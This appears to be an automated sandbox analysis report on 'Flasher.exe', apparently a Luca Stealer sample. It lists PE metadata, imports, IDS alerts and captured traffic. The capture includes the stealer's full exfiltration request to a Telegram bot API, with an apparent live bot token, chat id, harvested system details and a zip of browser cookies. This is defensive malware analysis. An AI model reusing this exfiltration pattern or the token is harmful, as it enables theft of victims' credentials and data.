                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x676EC2CA [Fri Dec 27 15:07:54 2024 UTC]
                                                                    TLS Callbacks:0x400e6160, 0x1
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:0
                                                                    File Version Major:6
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:9ee638580f9771af3dc4c446e1a6db71
                                                                    Instruction
                                                                    dec eax
                                                                    sub esp, 28h
                                                                    call 00007FDA350C2AB8h
                                                                    dec eax
                                                                    add esp, 28h
                                                                    jmp 00007FDA350C22E7h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    nop word ptr [eax+eax+00000000h]
                                                                    dec eax
                                                                    sub esp, 10h
                                                                    dec esp
                                                                    mov dword ptr [esp], edx
                                                                    dec esp
                                                                    mov dword ptr [esp+08h], ebx
                                                                    dec ebp
                                                                    xor ebx, ebx
                                                                    dec esp
                                                                    lea edx, dword ptr [esp+18h]
                                                                    dec esp
                                                                    sub edx, eax
                                                                    dec ebp
                                                                    cmovb edx, ebx
                                                                    dec esp
                                                                    mov ebx, dword ptr [00000010h]
                                                                    dec ebp
                                                                    cmp edx, ebx
                                                                    jnc 00007FDA350C2488h
                                                                    inc cx
                                                                    and edx, 8D4DF000h
                                                                    wait
                                                                    add al, dh
                                                                    Programming Language:
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x304e440x1cc.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x30e0000xe298.pdata
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x31d0000x2ec4.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x2f97800x54.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x2f98000x28.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2f96400x140.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x24a0000x8f0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x248d220x248e00b1bb9279267b50a5043e154ab4ae2346unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x24a0000xbceae0xbd000dac997b2fcb9e6078fc85e4c271d8edeFalse0.49333069816468256data5.940580286739089IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x3070000x6c480x600003bf1b535e057fc1f9a3226bd561721bFalse0.4155680338541667data4.307032103447474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .pdata0x30e0000xe2980xe40019a10878ab576b8c43721c2d1609233fFalse0.4992804276315789data6.160976868237233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x31d0000x2ec40x3000329022e6fb1075d2f3592e2d5db21780False0.4141438802083333data5.404204931942349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    DLLImport
                                                                    api-ms-win-core-synch-l1-2-0.dllWakeByAddressSingle, WakeByAddressAll, WaitOnAddress
                                                                    bcryptprimitives.dllProcessPrng
                                                                    kernel32.dllFormatMessageW, lstrlenW, GetEnvironmentVariableW, GetTempPathW, GetModuleFileNameW, CreateFileW, SetFileInformationByHandle, GetFileInformationByHandleEx, GetFullPathNameW, SetFilePointerEx, FindNextFileW, CreateDirectoryW, FindFirstFileW, QueryPerformanceFrequency, GetTimeZoneInformation, SystemTimeToFileTime, SystemTimeToTzSpecificLocalTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, GetCurrentProcess, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, GetCurrentProcessId, CreateNamedPipeW, CreateThread, WriteFileEx, SleepEx, ReadFileEx, CreateEventW, CancelIo, ReadFile, QueryPerformanceCounter, HeapAlloc, GetProcessHeap, GetCurrentDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, GetProcAddress, LoadLibraryA, CreateMutexA, ReleaseMutex, RtlVirtualUnwind, WideCharToMultiByte, CopyFileExW, PostQueuedCompletionStatus, FileTimeToSystemTime, GetSystemTimeAsFileTime, GetModuleHandleA, WriteConsoleW, MultiByteToWideChar, UnhandledExceptionFilter, GetExitCodeProcess, WaitForSingleObject, GetConsoleMode, GetStdHandle, AddVectoredExceptionHandler, FlushFileBuffers, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, FreeLibrary, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, Sleep, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, SetThreadStackGuarantee, SetHandleInformation, GetCurrentThread, SetUnhandledExceptionFilter, TerminateProcess, GetOverlappedResult, GetModuleHandleW, GetFileInformationByHandle, SwitchToThread, SetLastError, GetFinalPathNameByHandleW, WaitForMultipleObjects, GetSystemInfo, GetSystemTimePreciseAsFileTime, GetLastError, GetQueuedCompletionStatusEx, FindClose, CloseHandle, HeapFree, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, HeapReAlloc, CreateIoCompletionPort, SetFileCompletionNotificationModes, WaitForSingleObjectEx
                                                                    oleaut32.dllSafeArrayGetUBound, SafeArrayAccessData, SysAllocStringLen, SafeArrayDestroy, VariantClear, SysFreeString, SafeArrayUnaccessData, SafeArrayGetLBound
                                                                    crypt32.dllCertCloseStore, CertDuplicateCertificateChain, CertAddCertificateContextToStore, CertEnumCertificatesInStore, CertOpenStore, CryptUnprotectData, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CertGetCertificateChain, CertDuplicateCertificateContext, CertDuplicateStore, CertFreeCertificateContext
                                                                    ole32.dllCoInitializeSecurity, CoInitializeEx, CoCreateInstance, CoSetProxyBlanket
                                                                    advapi32.dllCheckTokenMembership, RegCloseKey, FreeSid, RegOpenKeyExW, RegQueryValueExW, AllocateAndInitializeSid
                                                                    user32.dllEnumDisplayMonitors, EnumDisplaySettingsExW, GetMonitorInfoW
                                                                    gdi32.dllDeleteObject, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, StretchBlt, CreateDCW, GetDeviceCaps, DeleteDC, GetDIBits, GetObjectW
                                                                    ntdll.dllRtlNtStatusToDosError, NtDeviceIoControlFile, NtCreateFile, NtWriteFile, NtReadFile, NtCancelIoFileEx
                                                                    bcrypt.dllBCryptGenRandom
                                                                    ws2_32.dllgetsockopt, closesocket, bind, setsockopt, ioctlsocket, WSAIoctl, freeaddrinfo, connect, getsockname, WSAGetLastError, getpeername, WSASocketW, getaddrinfo, WSASend, WSAStartup, WSACleanup, recv, send, shutdown
                                                                    secur32.dllFreeContextBuffer, DeleteSecurityContext, FreeCredentialsHandle, EncryptMessage, AcquireCredentialsHandleA, QueryContextAttributesW, AcceptSecurityContext, InitializeSecurityContextW, DecryptMessage, ApplyControlToken
                                                                    VCRUNTIME140.dllmemmove, memcmp, memset, __CxxFrameHandler3, strrchr, __current_exception_context, __current_exception, __C_specific_handler, memcpy
                                                                    api-ms-win-crt-string-l1-1-0.dllstrncmp, strcspn, strcmp, strlen
                                                                    api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, realloc, _msize, malloc, free
                                                                    api-ms-win-crt-utility-l1-1-0.dll_rotl64, qsort
                                                                    api-ms-win-crt-time-l1-1-0.dll_localtime64_s
                                                                    api-ms-win-crt-math-l1-1-0.dlllog, __setusermatherr, _dclass
                                                                    api-ms-win-crt-runtime-l1-1-0.dll_get_initial_narrow_environment, _configure_narrow_argv, _initterm_e, exit, _exit, _set_app_type, _seh_filter_exe, __p___argc, _initialize_narrow_environment, __p___argv, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _endthreadex, _beginthreadex, _initterm, _initialize_onexit_table, _register_onexit_function, _crt_atexit, terminate
                                                                    api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                                                    api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-12-27T21:48:09.220898+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449737149.154.167.220443TCP
                                                                    2024-12-27T21:48:09.220898+01002029323ET MALWARE Possible Generic RAT over Telegram API1192.168.2.449737149.154.167.220443TCP
                                                                    2024-12-27T21:48:09.220898+01002044524ET MALWARE Win32/Luca Stealer Sending System Information via Telegram (GET)1192.168.2.449737149.154.167.220443TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 27, 2024 21:48:00.938024044 CET49736443192.168.2.4108.181.61.49
                                                                    Dec 27, 2024 21:48:00.938062906 CET44349736108.181.61.49192.168.2.4
                                                                    Dec 27, 2024 21:48:00.938132048 CET49736443192.168.2.4108.181.61.49
                                                                    Dec 27, 2024 21:48:00.949522018 CET49736443192.168.2.4108.181.61.49
                                                                    Dec 27, 2024 21:48:00.949532032 CET44349736108.181.61.49192.168.2.4
                                                                    Dec 27, 2024 21:48:03.352962017 CET44349736108.181.61.49192.168.2.4
                                                                    Dec 27, 2024 21:48:03.353056908 CET49736443192.168.2.4108.181.61.49
                                                                    Dec 27, 2024 21:48:03.356683969 CET49736443192.168.2.4108.181.61.49
                                                                    Dec 27, 2024 21:48:03.356709957 CET44349736108.181.61.49192.168.2.4
                                                                    Dec 27, 2024 21:48:03.357090950 CET44349736108.181.61.49192.168.2.4
                                                                    Dec 27, 2024 21:48:03.397682905 CET49736443192.168.2.4108.181.61.49
                                                                    Dec 27, 2024 21:48:03.412977934 CET49736443192.168.2.4108.181.61.49
                                                                    Dec 27, 2024 21:48:03.455337048 CET44349736108.181.61.49192.168.2.4
                                                                    Dec 27, 2024 21:48:04.017157078 CET44349736108.181.61.49192.168.2.4
                                                                    Dec 27, 2024 21:48:04.017237902 CET44349736108.181.61.49192.168.2.4
                                                                    Dec 27, 2024 21:48:04.017304897 CET49736443192.168.2.4108.181.61.49
                                                                    Dec 27, 2024 21:48:04.018726110 CET49736443192.168.2.4108.181.61.49
                                                                    Dec 27, 2024 21:48:04.018744946 CET44349736108.181.61.49192.168.2.4
                                                                    Dec 27, 2024 21:48:07.791484118 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:07.791541100 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:07.791637897 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:07.791956902 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:07.791976929 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.216423035 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.216496944 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.218820095 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.218835115 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.219079971 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.220561028 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.220606089 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.220694065 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.220735073 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.220833063 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.220899105 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.220901012 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.220921993 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.220973015 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.220989943 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.220999002 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221009970 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.221035004 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221045017 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.221064091 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221076012 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.221154928 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221168041 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.221187115 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221194983 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.221223116 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221235991 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.221313000 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221323967 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.221343040 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221364975 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221388102 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221412897 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221484900 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221508980 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221520901 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221537113 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.221579075 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.267333031 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.267554045 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.267579079 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.267600060 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.267621994 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.267637968 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.267646074 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.267661095 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.267676115 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.267693043 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.315331936 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.315458059 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.315480947 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.315510035 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.315531969 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.315541983 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.315558910 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.315577030 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.315584898 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.363339901 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.363575935 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.363596916 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.407366037 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.447293997 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.447376013 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.447415113 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.447463036 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.495328903 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.495441914 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.543339014 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.567001104 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.567135096 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.567158937 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.567229033 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.567270041 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.567290068 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.611331940 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.611438036 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.655332088 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.688136101 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.688242912 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.688263893 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.688354015 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.688379049 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.688401937 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.688430071 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.688448906 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.688474894 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.688551903 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.690058947 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.690082073 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.690188885 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.690233946 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.690342903 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.690361023 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.690423965 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:09.690432072 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:09.808027029 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:11.152036905 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:11.154447079 CET44349737149.154.167.220192.168.2.4
                                                                    Dec 27, 2024 21:48:11.154512882 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:11.155147076 CET49737443192.168.2.4149.154.167.220
                                                                    Dec 27, 2024 21:48:11.155164003 CET44349737149.154.167.220192.168.2.4
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 27, 2024 21:48:00.795998096 CET5086753192.168.2.41.1.1.1
                                                                    Dec 27, 2024 21:48:00.934143066 CET53508671.1.1.1192.168.2.4
                                                                    Dec 27, 2024 21:48:07.651525021 CET5268053192.168.2.41.1.1.1
                                                                    Dec 27, 2024 21:48:07.789971113 CET53526801.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 27, 2024 21:48:00.795998096 CET192.168.2.41.1.1.10x12b9Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                                                                    Dec 27, 2024 21:48:07.651525021 CET192.168.2.41.1.1.10x4f2eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 27, 2024 21:48:00.934143066 CET1.1.1.1192.168.2.40x12b9No error (0)ipwho.is108.181.61.49A (IP address)IN (0x0001)false
                                                                    Dec 27, 2024 21:48:07.789971113 CET1.1.1.1192.168.2.40x4f2eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                    • ipwho.is
                                                                    • api.telegram.org
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449736108.181.61.494437284C:\Users\user\Desktop\Flasher.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-27 20:48:03 UTC47OUTGET / HTTP/1.1
                                                                    accept: */*
                                                                    host: ipwho.is
                                                                    2024-12-27 20:48:04 UTC223INHTTP/1.1 200 OK
                                                                    Date: Fri, 27 Dec 2024 20:48:03 GMT
                                                                    Content-Type: application/json; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: ipwhois
                                                                    Access-Control-Allow-Headers: *
                                                                    X-Robots-Tag: noindex
                                                                    2024-12-27 20:48:04 UTC715INData Raw: 32 62 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22
                                                                    Data Ascii: 2bf{"ip":"8.46.123.189","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449737149.154.167.2204437284C:\Users\user\Desktop\Flasher.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-27 20:48:09 UTC1032OUTGET /bot7812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOA/sendDocument?chat_id=-4662852241&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20YT3TY%20(1280,%201024)%0AHWID:%205676401068884178%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Flasher.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%2025%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2018%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1
                                                                    content-type: multipart/form-data; boundary=65630d81a695e841-884032d12ba6fc1d-ddec9f059967c02d-61ea391d86b43416
                                                                    content-length: 938714
                                                                    accept: */*
                                                                    host: api.telegram.org
                                                                    2024-12-27 20:48:09 UTC15352OUTData Raw: 2d 2d 36 35 36 33 30 64 38 31 61 36 39 35 65 38 34 31 2d 38 38 34 30 33 32 64 31 32 62 61 36 66 63 31 64 2d 64 64 65 63 39 66 30 35 39 39 36 37 63 30 32 64 2d 36 31 65 61 33 39 31 64 38 36 62 34 33 34 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6a 6f 6e 65 73 5b 38 2e 34 36 2e 31 32 33 2e 31 38 39 5d 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 03 7e 9b 59 b9 3a 30 8b f8 0c 00 00 f8 0c 00 00 1a 00 00 00 63 6f 6f 6b 69 65 73 5f 67 6f 6f 67 6c 65 5f 64 65 66 61 75 6c 74 2e 74 78 74 2e 67 6f 6f 67 6c 65 2e 63 6f
                                                                    Data Ascii: --65630d81a695e841-884032d12ba6fc1d-ddec9f059967c02d-61ea391d86b43416Content-Disposition: form-data; name="document"; filename="user[8.46.123.189].zip"Content-Type: application/zipPK~Y:0cookies_google_default.txt.google.co
                                                                    2024-12-27 20:48:09 UTC16384OUTData Raw: 80 22 4e 52 87 81 eb 71 69 87 b5 2d b9 ba d4 58 20 7c 69 06 c2 97 c9 c8 cd 97 42 31 f5 b2 9d c7 0d 32 9e 71 9e 6b 4f c8 e6 e3 cb 1e 50 c7 4d 9f ba 4e df 15 24 17 d0 d4 01 d9 0e 4e fc 82 f1 27 90 3a 61 60 94 25 fd f2 26 18 cf 81 da 81 00 36 c7 35 72 83 ad 7f 8a 49 57 7d 80 e2 ee ec 53 8c 63 86 11 e7 3c e8 b3 6f 18 b6 c8 f1 6b 9b 92 71 52 db 1a af 6e 5e b9 36 49 5d ac 0b 51 ca 40 cd b3 36 f5 d5 8a 31 8e f5 bb 56 ac 37 a0 24 71 92 0a 50 58 e5 41 e3 98 5c ad 2e c2 5c 30 fc 90 3c fb d6 e6 f8 56 ab 71 d6 34 37 d6 de a4 3e d6 ed 93 03 42 aa d6 22 86 ac bd 8c b9 83 61 4b 31 cf 6f ea 39 dc 5c 92 f9 b4 2b 1b 23 c1 c0 2b eb 83 ad de 0b cc da 8d 91 94 ed dd 5c c6 78 1e 6a d7 26 69 83 91 c3 63 e6 18 61 1c 2f 71 92 98 8a cf 05 68 e3 cd a9 0e d4 fc 47 6e ea 8d 15 9f a6
                                                                    Data Ascii: "NRqi-X |iB12qkOPMN$N':a`%&65rIW}Sc<okqRn^6I]Q@61V7$qPXA\.\0<Vq47>B"aK1o9\+#+\xj&ica/qhGn
